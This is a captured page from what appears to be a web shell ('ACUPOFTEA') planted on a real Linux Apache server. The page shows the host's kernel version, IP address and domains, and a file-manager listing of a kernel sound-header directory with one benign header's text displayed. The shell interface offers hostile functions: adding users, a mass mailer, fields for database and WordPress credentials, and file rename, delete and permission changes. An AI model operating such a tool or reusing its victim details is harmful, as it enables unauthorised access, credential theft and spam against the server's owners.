System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
sound
/
216.73.216.122
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
usb_stream.h
/* SPDX-License-Identifier: GPL-2.0+ WITH Linux-syscall-note */ /* * Copyright (C) 2007, 2008 Karsten Wiese <fzu@wemgehoertderstaat.de> */ #ifndef __SOUND_USB_STREAM_H #define __SOUND_USB_STREAM_H #define USB_STREAM_INTERFACE_VERSION 2 #define SNDRV_USB_STREAM_IOCTL_SET_PARAMS \ _IOW('H', 0x90, struct usb_stream_config) struct usb_stream_packet { unsigned offset; unsigned length; }; struct usb_stream_config { unsigned version; unsigned sample_rate; unsigned period_frames; unsigned frame_size; }; struct usb_stream { struct usb_stream_config cfg; unsigned read_size; unsigned write_size; int period_size; unsigned state; int idle_insize; int idle_outsize; int sync_packet; unsigned insize_done; unsigned periods_done; unsigned periods_polled; struct usb_stream_packet outpacket[2]; unsigned inpackets; unsigned inpacket_head; unsigned inpacket_split; unsigned inpacket_split_at; unsigned next_inpacket_split; unsigned next_inpacket_split_at; struct usb_stream_packet inpacket[0]; }; enum usb_stream_state { usb_stream_invalid, usb_stream_stopped, usb_stream_sync0, usb_stream_sync1, usb_stream_ready, usb_stream_running, usb_stream_xrun, }; #endif /* __SOUND_USB_STREAM_H */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-10-28 10:57:27
..
DIR
-
drwxr-xr-x
2025-10-28 10:57:27
intel
DIR
-
drwxr-xr-x
2025-10-27 03:42:54
sof
DIR
-
drwxr-xr-x
2025-10-28 10:57:27
asequencer.h
text/x-c
20.61 KB
-rw-r--r--
2025-10-27 03:42:53
asoc.h
text/x-c
21.96 KB
-rw-r--r--
2025-10-27 03:42:53
asound.h
text/x-c
50.02 KB
-rw-r--r--
2025-10-27 03:42:53
asound_fm.h
text/x-Algol68
3.55 KB
-rw-r--r--
2025-10-27 03:42:53
compress_offload.h
text/x-c
5.79 KB
-rw-r--r--
2025-10-27 03:42:53
compress_params.h
text/x-c
16.08 KB
-rw-r--r--
2025-10-27 03:42:53
emu10k1.h
text/x-c
18.38 KB
-rw-r--r--
2025-10-27 03:42:53
firewire.h
text/x-c
10.76 KB
-rw-r--r--
2025-10-27 03:42:53
hdsp.h
text/x-c
2.03 KB
-rw-r--r--
2025-10-27 03:42:53
hdspm.h
text/x-c
4.38 KB
-rw-r--r--
2025-10-27 03:42:53
sb16_csp.h
text/x-c
3.48 KB
-rw-r--r--
2025-10-27 03:42:53
sfnt_info.h
text/x-c
6.6 KB
-rw-r--r--
2025-10-27 03:42:53
skl-tplg-interface.h
text/x-c
5.2 KB
-rw-r--r--
2025-10-27 03:42:53
snd_sst_tokens.h
text/plain
11.48 KB
-rw-r--r--
2025-10-27 03:42:53
tlv.h
text/plain
3.98 KB
-rw-r--r--
2025-10-27 03:42:53
usb_stream.h
text/x-c
1.21 KB
-rw-r--r--
2025-10-27 03:42:53
~ ACUPOFTEA - mail.ontime-ae.com